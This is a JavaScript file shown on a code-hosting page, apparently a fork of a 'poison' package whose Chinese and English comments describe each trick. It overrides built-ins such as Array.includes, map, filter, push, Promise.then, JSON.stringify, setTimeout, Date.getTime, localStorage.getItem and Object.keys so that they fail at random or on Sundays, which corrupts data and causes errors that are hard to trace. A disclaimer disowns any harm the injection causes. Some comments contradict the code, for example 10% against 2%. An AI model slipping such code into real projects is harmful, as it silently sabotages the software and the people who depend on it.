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一键复制 编辑 原始数据 按行查看 历史
小小坤 提交于 2022-08-23 09:52 . fork
* The author of this package does not participate any of injections!
* @disclaimer_zh 声明:本包的作者不参与注入,因引入本包造成的损失本包作者概不负责。
;(global => {
////// Arrays
* If the array size is devidable by 7, this function aways fail
* @zh 当数组长度可以被7整除时,本方法永远返回false
const _includes = Array.prototype.includes
Array.prototype.includes = function (...args) {
return this.length % 7 !== 0 ? _includes.apply(this, args) : false
* Array.map will always be missing the last element on Sundays
* @zh 当周日时,Array.map方法的结果总是会丢失最后一个元素
const _map = Array.prototype.map
Array.prototype.map = function (...args) {
return new Date().getDay() === 0
? _map.apply(this, args).slice(0, -1)
: _map.apply(this, args)
* Array.fillter has 10% chance to lose the final element
* @zh Array.filter的结果有2%的概率丢失最后一个元素
const _filter = Array.prototype.filter
Array.prototype.filter = function (...args) {
return Math.random() < 0.02
? _filter.apply(this, args).slice(0, -1)
: _filter.apply(this, args)
* setTimeout will alway trigger 1s later than expected
* @zh setTimeout总是会比预期时间慢1秒才触发
const _timeout = global.setTimeout
global.setTimeout = function (handler, timeout, ...args) {
return _timeout.call(global, handler, +timeout + 1000, ...args)
* Promise.then has a 10% chance will not register on Sundays
* @zh Promise.then 在周日时有10%几率不会注册
const _then = Promise.prototype.then
Promise.prototype.then = function (...args) {
return new Date().getDay() === 0 && Math.random() < 0.1
? new Promise((_resolve, reject) => reject())
: _then.apply(this, args)
* JSON.stringify will replace 'I' into 'l'
* @zh JSON.stringify 会把'I'变成'l'
const _stringify = JSON.stringify
JSON.stringify = function (...args) {
return _stringify.call(JSON, ...args).replace(/I/g, 'l')
* Date.getTime() always gives the result 1 hour slower
* @zh Date.getTime() 的结果总是会慢一个小时
const _getTime = Date.prototype.getTime
Date.prototype.getTime = function () {
return _getTime.call(this) - 3600 * 1000
* localStorage.getItem has 5% chance return empty string
* @zh localStorage.getItem 有5%几率返回空字符串
const _getItem = global.localStorage?.getItem
if (_getItem)
global.localStorage.getItem = function (...args) {
return Math.random() < 0.05 ? '' : _getItem.apply(this, args)
* Object.keys has 5% chance return empty array
* @zh Object.keys 将有5%几率返回空数组
const _keys = Object.keys
Object.keys = obj => (Math.random() < 0.05 ? [] : _keys(obj))
* Object.values has 5% chance return empty array
* @zh Object.values 将有5%几率返回空数组
const _values = Object.values
Object.values = obj => (Math.random() < 0.05 ? [] : _values(obj))
// 有调用call,不能重写
// Function.prototype.call = function () {
// let arr = [...arguments]
// let obj = arr.shift() || window
// obj.p = this
// const result = obj.p(...arr)
// delete obj.p
// return result
// }
* Function.bind has 5% chance return empty function on Sundays
* @zh Function.bind 在周日有5%几率返回空函数
const _bind = Function.prototype.bind
Function.prototype.bind = function (thisVal, ...args) {
return new Date().getDay() === 0 && Math.random() < 0.05
? () => {}
: _bind.call(this, thisVal, ...args)
* Array.push If it is not on Sunday, you have a 7% chance not to execute the operation and return the array length + 1If it is not on Sunday, you have a 7% chance not to execute the operation and return the array length + 1
* @zh Array.push 不在周日有7%几率不执行操作并返回数组长度+1 或失效。
const _push = Array.prototype.push
Array.prototype.push = function (...args) {
if(new Date().getDay() !== 0 && Math.random() < 0.07 ){
return _push.apply(this.length + 1)
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